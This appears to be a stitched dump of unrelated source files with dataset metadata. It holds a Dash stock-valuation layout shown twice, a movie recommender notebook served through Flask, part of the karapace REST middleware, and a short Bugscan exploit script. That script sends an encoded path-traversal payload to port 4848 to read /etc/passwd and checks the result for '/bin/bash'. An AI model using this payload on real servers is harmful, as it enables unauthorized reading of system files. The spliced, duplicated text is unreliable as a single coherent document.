'Sales-to-Capital(%)', 'Net Profit Margin(%)', 'Revenue Growth(%)'], multi=True ), dbc.Spinner(dcc.Graph( id='plot-indicators' ))]) ]), ]), # row 2 dbc.Row([ dbc.Col(make_card("Current Year Input (Use Latest 10K/10Q to Override)", "warning", get_dcf_current_year_input_overrides()) ), dbc.Col(make_card("Other Input Overrides", "warning", [get_other_input_overrides(), html.Br(), dcc.Markdown(children=''' **Other Assumptions for Intrinsic Value DCF Valuation:**\n 1. TERMINAL_YEAR_LENGTH = 10 2. No Preferred stock/dividends in capital structure (you can override this) 3. No Convertible debt/equity portion in capital structure (you can override this) '''), dbc.Button("Run DCF calculation again with overrides", id='run-dcf', color='primary', block=True), make_card("DCF table (2-stage Terminal value after 10 years) ", "secondary", dbc.Spinner(html.Div(id="dcf-table"))) ])), dbc.Col([ make_card("Notes/Commentary", "primary", dbc.Textarea(bs_size="lg", placeholder='Enter your notes and commentary on the analysis') ) ]) ],form=True), # row 3 dbc.Row([ dbc.Col([ ]), ]), # row 4 dbc.Row([dbc.Col( # MD text area Element for interpretation and analysis of data dcc.Markdown(children=source_credits + assumptions + disclaimer) ) ]) # footer row ]) sectorlayout = html.Div([ navheader, # html.H3('Sector Value Analysis'), # MD text area Element for Introduction dbc.Row([dbc.Col( [dcc.Markdown(children=''' ### Find the best picks in the sector! ### ''' )], ), ]), # heading row html.Div(id='sector-app-display-value', children="Under Construction! Features may change without notice!", style={'backgroundColor': 'red', 'fontSize': '200%'}), html.Br(), dbc.NavLink('IEX Cloud is the easiest way to use financial data. Get started now by clicking this referral link!', href="https://iexcloud.io/s/b47b5006"), html.Br(), html.P("Please note that sandbox test response data shown below from IEX Cloud Sandbox APIs is purposefully manipulated to scramble values and is not suitable for production usage. Data returned in the sandbox will look real, but strings are scrambled, dates are manipulated, and numbers are changed.", style={'color': 'red'}), dbc.NavLink('See this link for more information on Sandbox Testing', href="https://iexcloud.io/docs/api/#testing-sandbox"), html.Br(), dcc.Store(id='sector-store'), # Element for Graph plot of Sector Picks dbc.Row([ dbc.Col([html.Div([ html.H5('Select Sector(s): '), dcc.Dropdown( id='select-sector', options=[{'label': i, 'value': i} for i in ["Electronic Technology", "Distribution Services", "Health Technology", "Commercial Services", "Industrial Services", "Finance", "Process Industries", "Transportation", "Technology Services", "Producer Manufacturing", "Retail Trade", "Consumer Services", "Non-Energy Minerals", "Utilities", "Miscellaneous", "Health Services", "Consumer Durables", "Consumer Non-Durables", "Communications", "Energy Minerals", "Government"]], value=["Electronic Technology", "Health Technology", "Technology Services"], multi=True ), ]) ]), ]), # row 1 dbc.Row([ dbc.Col([ html.Br(), dcc.Dropdown( id='select-company', value=[], multi=True, placeholder='Filter to one or more companies, start typing in dropdown' ), dbc.Label("Filter by Enterprise Value (in billions)", html_for="sector-ev-filter"), dcc.RangeSlider(id="sector-ev-filter", min=7, max=13, step=0.001, value=[8, 12.699], marks={i: str(10 ** (i-9))+'B' for i in range(7, 14)}, updatemode='drag', ), html.H5('Crossfilter-Yaxis'), dcc.Dropdown( id='crossfilter-yaxis-column', value='EBITDAToRevenueMargin', ), ], width=3), dbc.Col([ dbc.NavLink('Data provided by IEX Cloud', href="https://iexcloud.io"), dbc.Spinner(dcc.Graph(id='sector-distribution' )), html.H5('Crossfilter-Xaxis'), dcc.Dropdown( id='crossfilter-xaxis-column', value='EBITDAToEV(%)', ), html.H5('Workaround: IEX Data is unreliable, so can change to Market Cap for filtering, analysis instead of preferred method using Enterprise Value (which includes Debt leverage)'), html.Br(), html.H5('If graph is blank, IEX Data has been filtered out due to NAs') ]) ]), # row 2 dbc.Row([dbc.Col( # MD text area Element for footer dcc.Markdown(children=disclaimer) ) ]) # footer row ])
<filename>layouts.py from math import log10 import dash_core_components as dcc import dash_html_components as html import dash_bootstrap_components as dbc import dash_table as dt # Local imports from __init__ import VERSION, DEFAULT_TICKER, DEFAULT_SNAPSHOT_UUID from dash_utils import make_card, ticker_inputs, make_item, make_social_media_share from dynamic_layouts import get_dcf_current_year_input_overrides, get_other_input_overrides from assets.about import source_credits, assumptions from assets.disclaimer import disclaimer # Reference and some Dashboard components inspired by: https://medium.com/swlh/how-to-create-a-dashboard-to-dominate-the-stock-market-using-python-and-dash-c35a12108c93 navheader = dbc.Row([dbc.Col( dbc.Nav([ dbc.NavLink("Main", href="/", id='nav-main'), dbc.NavLink("DCF Valuation Analysis", href="/apps/dcf/AAPL", id='nav-dcf'), dbc.NavLink("Sector Value Analysis", href="/apps/sector", id='nav-sector'), ], pills=True), ), dbc.Col(id='social-share', align='right', width=400), dbc.Col([html.Small('VERSION:'), html.P(VERSION)], align='right', width=60) ]) tabheader = html.Div([ dbc.Tabs([ dbc.Tab(label="DCF Valuation Analysis", tab_id="tab-dcf"), dbc.Tab(label="Sector Value Analysis", tab_id="tab-sector"), ], id="tabs", active_tab="tab-dcf", ), html.Div(id="tab-content"), ]) dcflayout = html.Div([ navheader, # html.H3('DCF Valuation Analysis'), # MD text area Element for Introduction dbc.Row([dbc.Col( [dcc.Markdown(children=''' ### Purpose of this web app ### ##### To be one of the tools to educate and democratize fundamentals DCF (Discounted Cash Flow) Valuation Analysis of public equity investments ##### See below for more details, Assumptions and Disclaimer or visit [About this DCF Valuation App](https://codepatel.github.io/dcf/) ''' )], ), ]), # heading row dbc.Row([ dbc.Col([ make_card("Ticker for Analysis", "info", [ticker_inputs('ticker-input', 'date-picker', 12*5), # dbc.Select( # id='ticker-input', # options=[{'label': s['symbol']+'('+s['exchange']+'):'+s['name'], 'value': s['symbol']} for s in symdata], # value='AAPL', # placeholder='Start typing Ticker, press Enter'), dbc.FormGroup( [ dbc.Label("Analysis mode selection: (if inactive, use Snapshot mode)"), dbc.Checklist( options=[ {"label": "Live?", "value": 1}, ], value=[1], id="analysis-mode", switch=True, ), ] ), html.Data(id='snapshot-uuid', value=DEFAULT_SNAPSHOT_UUID), html.Div([dbc.Button('Save Snapshot', id='save-snapshot', color='primary'), html.Span(dbc.NavLink('Snapshot Link to Bookmark', id='snapshot-link', href='/apps/dcf/'+DEFAULT_TICKER+'/'+DEFAULT_SNAPSHOT_UUID, disabled=True), style={"vertical-align": "middle"}), ]), ]), html.Div(id='ticker-allcaps'), make_card('Status Message', 'success', dbc.Spinner(html.P(id='status-info', loading_state={'is_loading': True}), fullscreen=False)), make_card('Supplemental Info', 'success', dbc.Spinner([html.P(id='supp-info'), dcc.Store(id='fin-store'), dcc.Store(id='dcf-store'), dcc.Store(id='topsstream-data'), dcc.Store(id="handler-parseURL"), dcc.Store(id="handler-ticker-valid"), dcc.Store(id="handler-past-data"), dcc.Store(id="handler-dcf-data"), dcc.Store(id='handler-lastpricestream'), dcc.Interval( id='price-update-interval', interval=15*1000, # in milliseconds n_intervals=0 ) ])) ]), dbc.Col([ make_card('DCF Inputs - Company factors', 'info', dbc.Tabs([ dbc.Tab( dbc.Form([ dbc.Label("Revenue Growth Rate (%) for next year", html_for="rgr-next"), dbc.Input(id="rgr-next", type="number", value=0, min=-50, step=0.1, placeholder="Enter number", debounce=True ), dbc.Label("Operating Margin (%) for next year excl. Reinvestment", html_for="opm-next"), dbc.Input(id="opm-next", type="number", value=0, max=50, step=0.1, placeholder="Enter number", debounce=True ), html.Br(), dbc.Label("CAGR (%) for years 2-5 (select range: 0 to 15)", html_for="cagr-2-5"), dcc.Slider(id="cagr-2-5", min=0, max=15, step=0.1, value=5, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 16)}), dbc.Label("Target Pre-Tax Operating Margin (%) in business model (select range: 0 to 50)", html_for="opm-target"), dcc.Slider(id="opm-target", min=0, max=50, step=0.1, value=20, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 55, 5)}), dbc.Label("Sales to capital ratio (for computing reinvestment, select range: 0 to 5)", html_for="sales-to-cap"), dcc.Slider(id="sales-to-cap", min=0, max=5, step=0.01, value=1, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 6)}), ]), label="GPE Levers", tab_id="tab-lever", label_style={"color": "#00AEF9"} ), dbc.Tab( dbc.Form([ html.P('In future, calculate Equity Risk Premium based on discrete inputs. For now, enter ERP:'), html.Br(), dbc.Label("Equity Risk Premium (%)", html_for="erp-calculated"), dbc.Input(id="erp-calculated", type="number", value=6, min=0, max=10, step=0.01, placeholder="Enter number", debounce=True ), ]), label="ERP Calculation", tab_id="tab-erp", label_style={"color": "#00AEF9"} ), ], id="company-tabs", active_tab="tab-lever", )) ]), dbc.Col([ make_card('DCF Inputs - Environmental factors', 'info', dbc.Form([ dbc.Label("Effective Tax Rate (%) (select range: 0 to 30)", html_for="tax-rate"), dcc.Slider(id="tax-rate", min=0, max=30, step=0.1, value=15, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 35, 5)}), dbc.Label("Riskfree Rate (%) (select range: 0 to 5)", html_for="riskfree-rate"), dcc.Slider(id="riskfree-rate", min=0, max=5, step=0.25, value=1.25, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 6)}), dbc.Label("Terminal Growth Rate (%) (select range: 0 to 5)", html_for="terminal-growth-rate"), dcc.Slider(id="terminal-growth-rate", min=0, max=5, step=0.25, value=3.5, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 6)}, disabled=False), dbc.Label("Cost of Capital / Discount Rate (%) (select range: 0 to 15)", html_for="cost-of-cap"), dcc.Slider(id="cost-of-cap", min=0, max=15, step=0.25, value=8.5, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 16)}), ])), make_card('DCF Outputs', 'success', dbc.Spinner(html.Div(id="dcf-data"))) ]), ]), #row 1 # Element for Graph plot of KPIndicators dbc.Row([ dbc.Col([ make_card("Past records Financial table (Current Year is TTM/MRQ) ", "secondary", dbc.Spinner(html.Div(id="fin-table"))), html.Small([html.A('Data source: Marketwatch.com', href='https://www.marketwatch.com/investing/stock/aapl/financials'), html.P('Copyright 2020 FactSet Research Systems Inc. All rights reserved. Source FactSet Fundamentals'), ]) ]), dbc.Col([html.Div([ html.H6('Select Parameter(s) to show trend over the past periods'), dcc.Dropdown( id='select-column', value=['ROCE(%)', 'Sales-to-Capital(%)', 'Net Profit Margin(%)', 'Revenue Growth(%)'], multi=True ), dbc.Spinner(dcc.Graph( id='plot-indicators' ))]) ]), ]), # row 2 dbc.Row([ dbc.Col(make_card("Current Year Input (Use Latest 10K/10Q to Override)", "warning", get_dcf_current_year_input_overrides()) ), dbc.Col(make_card("Other Input Overrides", "warning", [get_other_input_overrides(), html.Br(), dcc.Markdown(children=''' **Other Assumptions for Intrinsic Value DCF Valuation:**\n 1. TERMINAL_YEAR_LENGTH = 10 2. No Preferred stock/dividends in capital structure (you can override this) 3. No Convertible debt/equity portion in capital structure (you can override this) '''), dbc.Button("Run DCF calculation again with overrides", id='run-dcf', color='primary', block=True), make_card("DCF table (2-stage Terminal value after 10 years) ", "secondary", dbc.Spinner(html.Div(id="dcf-table"))) ])), dbc.Col([ make_card("Notes/Commentary", "primary", dbc.Textarea(bs_size="lg", placeholder='Enter your notes and commentary on the analysis') ) ]) ],form=True), # row 3 dbc.Row([ dbc.Col([ ]), ]), # row 4 dbc.Row([dbc.Col( # MD text area Element for interpretation and analysis of data dcc.Markdown(children=source_credits + assumptions + disclaimer) ) ]) # footer row ]) sectorlayout = html.Div([ navheader, # html.H3('Sector Value Analysis'), # MD text area Element for Introduction dbc.Row([dbc.Col( [dcc.Markdown(children=''' ### Find the best picks in the sector! ### ''' )], ), ]), # heading row html.Div(id='sector-app-display-value', children="Under Construction! Features may change without notice!", style={'backgroundColor': 'red', 'fontSize': '200%'}), html.Br(), dbc.NavLink('IEX Cloud is the easiest way to use financial data. Get started now by clicking this referral link!', href="https://iexcloud.io/s/b47b5006"), html.Br(), html.P("Please note that sandbox test response data shown below from IEX Cloud Sandbox APIs is purposefully manipulated to scramble values and is not suitable for production usage. Data returned in the sandbox will look real, but strings are scrambled, dates are manipulated, and numbers are changed.", style={'color': 'red'}), dbc.NavLink('See this link for more information on Sandbox Testing', href="https://iexcloud.io/docs/api/#testing-sandbox"), html.Br(), dcc.Store(id='sector-store'), # Element for Graph plot of Sector Picks dbc.Row([ dbc.Col([html.Div([ html.H5('Select Sector(s): '), dcc.Dropdown( id='select-sector', options=[{'label': i, 'value': i} for i in ["Electronic Technology", "Distribution Services", "Health Technology", "Commercial Services", "Industrial Services", "Finance", "Process Industries", "Transportation", "Technology Services", "Producer Manufacturing", "Retail Trade", "Consumer Services", "Non-Energy Minerals", "Utilities", "Miscellaneous", "Health Services", "Consumer Durables", "Consumer Non-Durables", "Communications", "Energy Minerals", "Government"]], value=["Electronic Technology", "Health Technology", "Technology Services"], multi=True ), ]) ]), ]), # row 1 dbc.Row([ dbc.Col([ html.Br(), dcc.Dropdown( id='select-company', value=[], multi=True, placeholder='Filter to one or more companies, start typing in dropdown' ), dbc.Label("Filter by Enterprise Value (in billions)", html_for="sector-ev-filter"), dcc.RangeSlider(id="sector-ev-filter", min=7, max=13, step=0.001, value=[8, 12.699], marks={i: str(10 ** (i-9))+'B' for i in range(7, 14)}, updatemode='drag', ), html.H5('Crossfilter-Yaxis'), dcc.Dropdown( id='crossfilter-yaxis-column', value='EBITDAToRevenueMargin', ), ], width=3), dbc.Col([ dbc.NavLink('Data provided by IEX Cloud', href="https://iexcloud.io"), dbc.Spinner(dcc.Graph(id='sector-distribution' )), html.H5('Crossfilter-Xaxis'), dcc.Dropdown( id='crossfilter-xaxis-column', value='EBITDAToEV(%)', ), html.H5('Workaround: IEX Data is unreliable, so can change to Market Cap for filtering, analysis instead of preferred method using Enterprise Value (which includes Debt leverage)'), html.Br(), html.H5('If graph is blank, IEX Data has been filtered out due to NAs') ]) ]), # row 2 dbc.Row([dbc.Col( # MD text area Element for footer dcc.Markdown(children=disclaimer) ) ]) # footer row ])
en
0.639522
# Local imports # Reference and some Dashboard components inspired by: https://medium.com/swlh/how-to-create-a-dashboard-to-dominate-the-stock-market-using-python-and-dash-c35a12108c93 # html.H3('DCF Valuation Analysis'), # MD text area Element for Introduction ### Purpose of this web app ### ##### To be one of the tools to educate and democratize fundamentals DCF (Discounted Cash Flow) Valuation Analysis of public equity investments ##### See below for more details, Assumptions and Disclaimer or visit [About this DCF Valuation App](https://codepatel.github.io/dcf/) # heading row # dbc.Select( # id='ticker-input', # options=[{'label': s['symbol']+'('+s['exchange']+'):'+s['name'], 'value': s['symbol']} for s in symdata], # value='AAPL', # placeholder='Start typing Ticker, press Enter'), # in milliseconds #row 1 # Element for Graph plot of KPIndicators # row 2 **Other Assumptions for Intrinsic Value DCF Valuation:**\n 1. TERMINAL_YEAR_LENGTH = 10 2. No Preferred stock/dividends in capital structure (you can override this) 3. No Convertible debt/equity portion in capital structure (you can override this) # row 3 # row 4 # MD text area Element for interpretation and analysis of data # footer row # html.H3('Sector Value Analysis'), # MD text area Element for Introduction ### Find the best picks in the sector! ### # heading row #testing-sandbox"), # Element for Graph plot of Sector Picks # row 1 # row 2 # MD text area Element for footer # footer row
2.027479
2
Bugscan_exploits-master/exp_list/exp-2426.py
csadsl/poc_exp
11
6627940
#!/usr/bin/env python # refer:http://www.wooyun.org/bugs/wooyun-2010-0144595 import urlparse def assign(service, arg): if service == "www": r = urlparse.urlparse(arg) return True, 'https://%s:4848/' %(r.netloc) def audit(arg): payload = 'theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd' code, head, res, errcode, _ = curl.curl2(arg + payload) if code == 200 and '/bin/bash' in res: security_hole(arg+payload) if __name__ == '__main__': from dummy import * audit(assign('www', 'https://172.16.17.32/')[1])
#!/usr/bin/env python # refer:http://www.wooyun.org/bugs/wooyun-2010-0144595 import urlparse def assign(service, arg): if service == "www": r = urlparse.urlparse(arg) return True, 'https://%s:4848/' %(r.netloc) def audit(arg): payload = 'theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd' code, head, res, errcode, _ = curl.curl2(arg + payload) if code == 200 and '/bin/bash' in res: security_hole(arg+payload) if __name__ == '__main__': from dummy import * audit(assign('www', 'https://172.16.17.32/')[1])
en
0.198952
#!/usr/bin/env python # refer:http://www.wooyun.org/bugs/wooyun-2010-0144595
2.322156
2
models/latent_vector_collaborative_recommend_forserver.py
doritos0812/deep-learning-project-platform
2
6627941
# -*- coding: utf-8 -*- """Latent_Vector_Collaborative_Recommend_forServer.ipynb Automatically generated by Colaboratory. Original file is located at https://colab.research.google.com/drive/15QsNrUfOFlIBW_rCJoE399hayVUqN3XX """ from sklearn.decomposition import TruncatedSVD from scipy.sparse.linalg import svds import matplotlib.pyplot as plt import seaborn as sns import pandas as pd import numpy as np import warnings warnings.filterwarnings("ignore") import os, sys from google.colab import drive ### 해당 코드 실행 시 colab에서 실행중인 폴더의 /content/drive/My Drive가 구글 드라이브에 연결됨 drive.mount('/content/drive') # 데이터셋 불러오기(MovieLens 100k) rating_data = pd.read_csv('drive/MyDrive/data/others/ratings.csv') # 평점 데이터셋 형태 확인 print("### Rating Dataset Format ###", end='\n\n') print(rating_data.head(), end='\n\n\n') rating_data.drop(['timestamp'], axis=1, inplace=True) movie_data = pd.read_csv('drive/MyDrive/data/others/movies.csv') # 영화 데이터셋 형태 확인 print("### Movie Dataset Format ###", end = '\n\n') print("Columns of Movie Dataset : ",movie_data.columns, end = '\n\n') print(movie_data.head()) print(movie_data.shape) print(rating_data.shape) movie_data.drop('genres', axis = 1, inplace = True) user_movie_data = pd.merge(rating_data, movie_data, on = 'movieId') user_movie_data.head() user_movie_data.shape user_movie_rating = user_movie_data.pivot_table('rating', index = 'userId', columns='title').fillna(0) user_movie_rating.shape user_movie_rating.head() movie_user_rating = user_movie_rating.values.T movie_user_rating.shape type(movie_user_rating) SVD = TruncatedSVD(n_components=12) matrix = SVD.fit_transform(movie_user_rating) matrix.shape matrix[0] corr = np.corrcoef(matrix) corr.shape corr2 = corr[:200, :200] corr2.shape plt.figure(figsize=(16, 10)) sns.heatmap(corr2) def get_recommend_movie_list(movie_name, top=20): # 특정 영화와 비슷한 영화를 추천해야 하기 때문에 '특정 영화' 정보를 뽑아낸다. movie_title = user_movie_rating.columns movie_title_list = list(movie_title) coffey_hands = movie_title_list.index(movie_name) corr_coffey_hands = corr[coffey_hands] #본인을 제외, Score 순으로 Sort, 역순으로 뒤집기 corr_coffey_hands = corr_coffey_hands.argsort()[:-1][::-1] #list으로 만들고 top 개수만큰 뽑아준 뒤 return result = list(movie_title[corr_coffey_hands])[:top] result = [x.split(' (')[0] for x in result] return result rec2 = get_recommend_movie_list('Avatar (2009)') rec2 from pandas import DataFrame df = DataFrame(rec2,columns=['title']) df import requests from urllib.request import urlopen from PIL import Image def movie_poster(titles): data_URL = 'http://www.omdbapi.com/?i=tt3896198&apikey=<KEY>' fig, axes = plt.subplots(2, 10, figsize=(30,9)) for i, ax in enumerate(axes.flatten()): w_title = titles[i].strip().split() params = { 's':titles[i], 'type':'movie', 'y':'' } response = requests.get(data_URL,params=params).json() if response["Response"] == 'True': poster_URL = response["Search"][0]["Poster"] img = Image.open(urlopen(poster_URL)) ax.imshow(img) ax.axis("off") if len(w_title) >= 10: ax.set_title(f"{i+1}. {' '.join(w_title[:5])}\n{' '.join(w_title[5:10])}\n{' '.join(w_title[10:])}", fontsize=10) elif len(w_title) >= 5: ax.set_title(f"{i+1}. {' '.join(w_title[:5])}\n{' '.join(w_title[5:])}", fontsize=10) else: ax.set_title(f"{i+1}. {titles[i]}", fontsize=10) plt.show() movie_poster(rec2) !pip install flask_cors !pip install flask-ngrok import io from flask_ngrok import run_with_ngrok from flask import Flask, jsonify, request from PIL import Image from flask_cors import CORS, cross_origin import os import json # 이미지를 읽어 결과를 반환하는 함수 def get_prediction(title): rec2 = get_recommend_movie_list(title) rec2 = DataFrame(rec2,columns=['title']) rec2 = rec2['title'].apply(lambda x : x.split(' (')[0]) # 이부분 필요없음. 근데 dataframe에서 apply 해줘야 [[],[]] 형태가 안생김. 이유는 모르겠음 return rec2.to_json(orient="split") app = Flask(__name__) CORS(app) @app.route('/post', methods=['POST']) def predict(): content = request.get_json(force=True, silent=True) print("title:", content['title']) title=content['title'] year=content['year'] input = title+' ('+year+')' print("input", input) #processing title if request.method == 'POST': #받은 데이터 처리 res = get_prediction(input) print("결과:", res) return jsonify(res) run_with_ngrok(app) app.run()
# -*- coding: utf-8 -*- """Latent_Vector_Collaborative_Recommend_forServer.ipynb Automatically generated by Colaboratory. Original file is located at https://colab.research.google.com/drive/15QsNrUfOFlIBW_rCJoE399hayVUqN3XX """ from sklearn.decomposition import TruncatedSVD from scipy.sparse.linalg import svds import matplotlib.pyplot as plt import seaborn as sns import pandas as pd import numpy as np import warnings warnings.filterwarnings("ignore") import os, sys from google.colab import drive ### 해당 코드 실행 시 colab에서 실행중인 폴더의 /content/drive/My Drive가 구글 드라이브에 연결됨 drive.mount('/content/drive') # 데이터셋 불러오기(MovieLens 100k) rating_data = pd.read_csv('drive/MyDrive/data/others/ratings.csv') # 평점 데이터셋 형태 확인 print("### Rating Dataset Format ###", end='\n\n') print(rating_data.head(), end='\n\n\n') rating_data.drop(['timestamp'], axis=1, inplace=True) movie_data = pd.read_csv('drive/MyDrive/data/others/movies.csv') # 영화 데이터셋 형태 확인 print("### Movie Dataset Format ###", end = '\n\n') print("Columns of Movie Dataset : ",movie_data.columns, end = '\n\n') print(movie_data.head()) print(movie_data.shape) print(rating_data.shape) movie_data.drop('genres', axis = 1, inplace = True) user_movie_data = pd.merge(rating_data, movie_data, on = 'movieId') user_movie_data.head() user_movie_data.shape user_movie_rating = user_movie_data.pivot_table('rating', index = 'userId', columns='title').fillna(0) user_movie_rating.shape user_movie_rating.head() movie_user_rating = user_movie_rating.values.T movie_user_rating.shape type(movie_user_rating) SVD = TruncatedSVD(n_components=12) matrix = SVD.fit_transform(movie_user_rating) matrix.shape matrix[0] corr = np.corrcoef(matrix) corr.shape corr2 = corr[:200, :200] corr2.shape plt.figure(figsize=(16, 10)) sns.heatmap(corr2) def get_recommend_movie_list(movie_name, top=20): # 특정 영화와 비슷한 영화를 추천해야 하기 때문에 '특정 영화' 정보를 뽑아낸다. movie_title = user_movie_rating.columns movie_title_list = list(movie_title) coffey_hands = movie_title_list.index(movie_name) corr_coffey_hands = corr[coffey_hands] #본인을 제외, Score 순으로 Sort, 역순으로 뒤집기 corr_coffey_hands = corr_coffey_hands.argsort()[:-1][::-1] #list으로 만들고 top 개수만큰 뽑아준 뒤 return result = list(movie_title[corr_coffey_hands])[:top] result = [x.split(' (')[0] for x in result] return result rec2 = get_recommend_movie_list('Avatar (2009)') rec2 from pandas import DataFrame df = DataFrame(rec2,columns=['title']) df import requests from urllib.request import urlopen from PIL import Image def movie_poster(titles): data_URL = 'http://www.omdbapi.com/?i=tt3896198&apikey=<KEY>' fig, axes = plt.subplots(2, 10, figsize=(30,9)) for i, ax in enumerate(axes.flatten()): w_title = titles[i].strip().split() params = { 's':titles[i], 'type':'movie', 'y':'' } response = requests.get(data_URL,params=params).json() if response["Response"] == 'True': poster_URL = response["Search"][0]["Poster"] img = Image.open(urlopen(poster_URL)) ax.imshow(img) ax.axis("off") if len(w_title) >= 10: ax.set_title(f"{i+1}. {' '.join(w_title[:5])}\n{' '.join(w_title[5:10])}\n{' '.join(w_title[10:])}", fontsize=10) elif len(w_title) >= 5: ax.set_title(f"{i+1}. {' '.join(w_title[:5])}\n{' '.join(w_title[5:])}", fontsize=10) else: ax.set_title(f"{i+1}. {titles[i]}", fontsize=10) plt.show() movie_poster(rec2) !pip install flask_cors !pip install flask-ngrok import io from flask_ngrok import run_with_ngrok from flask import Flask, jsonify, request from PIL import Image from flask_cors import CORS, cross_origin import os import json # 이미지를 읽어 결과를 반환하는 함수 def get_prediction(title): rec2 = get_recommend_movie_list(title) rec2 = DataFrame(rec2,columns=['title']) rec2 = rec2['title'].apply(lambda x : x.split(' (')[0]) # 이부분 필요없음. 근데 dataframe에서 apply 해줘야 [[],[]] 형태가 안생김. 이유는 모르겠음 return rec2.to_json(orient="split") app = Flask(__name__) CORS(app) @app.route('/post', methods=['POST']) def predict(): content = request.get_json(force=True, silent=True) print("title:", content['title']) title=content['title'] year=content['year'] input = title+' ('+year+')' print("input", input) #processing title if request.method == 'POST': #받은 데이터 처리 res = get_prediction(input) print("결과:", res) return jsonify(res) run_with_ngrok(app) app.run()
ko
0.968688
# -*- coding: utf-8 -*- Latent_Vector_Collaborative_Recommend_forServer.ipynb Automatically generated by Colaboratory. Original file is located at https://colab.research.google.com/drive/15QsNrUfOFlIBW_rCJoE399hayVUqN3XX ### 해당 코드 실행 시 colab에서 실행중인 폴더의 /content/drive/My Drive가 구글 드라이브에 연결됨 # 데이터셋 불러오기(MovieLens 100k) # 평점 데이터셋 형태 확인 ## Rating Dataset Format ###", end='\n\n') # 영화 데이터셋 형태 확인 ## Movie Dataset Format ###", end = '\n\n') # 특정 영화와 비슷한 영화를 추천해야 하기 때문에 '특정 영화' 정보를 뽑아낸다. #본인을 제외, Score 순으로 Sort, 역순으로 뒤집기 #list으로 만들고 top 개수만큰 뽑아준 뒤 return # 이미지를 읽어 결과를 반환하는 함수 # 이부분 필요없음. 근데 dataframe에서 apply 해줘야 [[],[]] 형태가 안생김. 이유는 모르겠음 #processing title #받은 데이터 처리
2.686142
3
karapace/rapu.py
hackaugusto/karapace
0
6627942
<gh_stars>0 """ karapace - Custom middleware system on top of `aiohttp` implementing HTTP server and client components for use in Aiven's REST applications. Copyright (c) 2019 Aiven Ltd See LICENSE for details """ from karapace.statsd import StatsClient from karapace.utils import json_encode from karapace.version import __version__ from typing import Dict, Optional from vendor.python_accept_types.accept_types import get_best_match import aiohttp import aiohttp.web import aiohttp_socks import async_timeout import asyncio import cgi import hashlib import json as jsonlib import logging import re import ssl import time SERVER_NAME = "Karapace/{}".format(__version__) SCHEMA_CONTENT_TYPES = [ "application/vnd.schemaregistry.v1+json", "application/vnd.schemaregistry+json", "application/json", "application/octet-stream", ] SCHEMA_ACCEPT_VALUES = [ "application/vnd.schemaregistry.v1+json", "application/vnd.schemaregistry+json", "application/json", ] # TODO -> accept more general values as well REST_CONTENT_TYPE_RE = re.compile( r"application/((vnd\.kafka(\.(?P<embedded_format>avro|json|binary|jsonschema))?(\.(?P<api_version>v[12]))?" r"\+(?P<serialization_format>json))|(?P<general_format>json|octet-stream))" ) REST_ACCEPT_RE = re.compile( r"(application|\*)/((vnd\.kafka(\.(?P<embedded_format>avro|json|binary|jsonschema))?(\.(?P<api_version>v[12]))?\+" r"(?P<serialization_format>json))|(?P<general_format>json|\*))" ) class HTTPRequest: def __init__( self, *, url: str, query, headers: Dict[str, str], path_for_stats: str, method: str, content_type: Optional[str] = None, accepts: Optional[str] = None, ): self.url = url self.headers = headers self._header_cache: Dict[str, Optional[str]] = {} self.query = query self.content_type = content_type self.accepts = accepts self.path_for_stats = path_for_stats self.method = method self.json = None def get_header(self, header: str, default_value: Optional[str] = None) -> Optional[str]: upper_cased = header.upper() if upper_cased in self._header_cache: return self._header_cache[upper_cased] for h in self.headers.keys(): if h.upper() == upper_cased: value = self.headers[h] self._header_cache[upper_cased] = value return value if upper_cased == "CONTENT-TYPE": # sensible default self._header_cache[upper_cased] = "application/json" else: self._header_cache[upper_cased] = default_value return self._header_cache[upper_cased] def __repr__(self): return "HTTPRequest(url=%s query=%s method=%s json=%r)" % (self.url, self.query, self.method, self.json) class HTTPResponse(Exception): """A custom Response object derived from Exception so it can be raised in response handler callbacks.""" def __init__(self, body, *, status: int = 200, content_type: Optional[str] = None, headers: Dict[str, str] = None): self.body = body self.status = status self.headers = dict(headers) if headers else {} if isinstance(body, (dict, list)): self.headers["Content-Type"] = "application/json" self.json = body else: self.json = None if content_type: self.headers["Content-Type"] = content_type super().__init__("HTTPResponse {}".format(status)) def ok(self): if self.status < 200 or self.status >= 300: return False return True def __repr__(self): return f"HTTPResponse(status={self.status} body={self.body})" def http_error(message, content_type, code): raise HTTPResponse( body=json_encode({ "error_code": code, "message": message, }, binary=True), headers={"Content-Type": content_type}, status=code, ) class RestApp: def __init__(self, *, app_name, sentry_config): self.app_name = app_name self.app_request_metric = "{}_request".format(app_name) self.app = aiohttp.web.Application() self.app.on_startup.append(self.create_http_client) self.app.on_cleanup.append(self.cleanup_http_client) self.http_client_v = None self.http_client_no_v = None self.log = logging.getLogger(self.app_name) self.stats = StatsClient(sentry_config=sentry_config) self.raven_client = self.stats.raven_client self.app.on_cleanup.append(self.cleanup_stats_client) async def cleanup_stats_client(self, app): # pylint: disable=unused-argument self.stats.close() async def create_http_client(self, app): # pylint: disable=unused-argument no_v_conn = aiohttp.TCPConnector(ssl=False) self.http_client_no_v = aiohttp.ClientSession(connector=no_v_conn, headers={"User-Agent": SERVER_NAME}) self.http_client_v = aiohttp.ClientSession(headers={"User-Agent": SERVER_NAME}) async def cleanup_http_client(self, app): # pylint: disable=unused-argument if self.http_client_no_v: await self.http_client_no_v.close() if self.http_client_v: await self.http_client_v.close() @staticmethod def cors_and_server_headers_for_request(*, request, origin="*"): # pylint: disable=unused-argument return { "Access-Control-Allow-Origin": origin, "Access-Control-Allow-Methods": "DELETE, GET, 